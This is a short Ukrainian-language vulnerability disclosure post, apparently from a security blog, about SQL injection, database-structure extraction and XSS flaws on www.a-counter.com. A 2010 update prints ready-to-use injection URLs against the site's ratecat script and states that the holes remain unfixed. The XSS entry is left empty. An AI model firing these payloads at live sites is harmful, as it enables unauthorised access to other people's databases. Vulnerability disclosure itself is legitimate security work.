Уразливості на www.a-counter.com
20:02 06.03.201010.07.2009
У жовтні, 01.10.2008, я знайшов SQL Injection, SQL DB Structure Extraction та Cross-Site Scripting уразливості на проекті http://www.a-counter.com. Про що найближчим часом сповіщу адміністрацію проекту.
Раніше я вже писав про уразливість на www.a-counter.com.
Детальна інформація про уразливості з’явиться пізніше.
06.03.2010
SQL Injection:
http://www.a-counter.com/cgi-bin/ratecat?code=%22'%20or%20version()=4.1%20or%201='
SQL DB Structure Extraction:
http://www.a-counter.com/cgi-bin/ratecat?code=’%221
XSS:
Уразливості досі не виправлені.